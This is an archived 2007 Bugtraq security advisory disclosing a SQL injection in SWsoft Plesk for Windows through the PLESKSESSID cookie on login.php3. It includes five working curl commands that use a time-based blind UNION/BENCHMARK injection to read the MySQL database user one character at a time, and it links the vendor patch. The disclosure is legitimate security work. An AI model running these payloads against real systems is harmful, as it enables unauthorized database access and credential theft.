| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 11 Sep 2007 19:45:07 -0400 From: "Nick Merritt" <nick.merritt@...kersafe.com> To: <bugtraq@...urityfocus.com> Subject: RE: ScanAlert Security Advisory HackerSafe Labs - Security Advisory http://www.hackersafelabs.com SWsoft Plesk for Windows - SQL Injection Vulnerability Date: 9-11-07 Vendor: www.swsoft.com Package: Plesk for Windows Versions: v7.6.1, v8.1.0, v8.1.1, v8.2.0 Vendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3 Credit: Nick I Merritt Risk: Related Exploit Range: Remote Attack Complexity: Medium Level of Authentication Needed: Not Required Confidentiality Impact: Major Integrity Impact: Major Availability Impact: Major Overview: SWsoft Plesk is a comprehensive control panel solution used by leading hosting providers worldwide for shared, virtual and dedicated hosting. Vulnerability: A SQL injection vulnerability exists in the Plesk application. Please see the following: SQL Injection Page 1: "login.php3" SQL Injection Page 2: "auth.php3" SQL Injection Cookie Parameter: "PLESKSESSID" Example: (Will extract the database user) 1) Delay=5224.3877 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" 2) Delay=5165.3031 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" 3) Delay=5158.9512 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" 4) Delay=5224.0980 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" 5) Delay=5241.5251 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" Solution: Apply the following patches - http://kb.swsoft.com/en/2159
Powered by blists - more mailing lists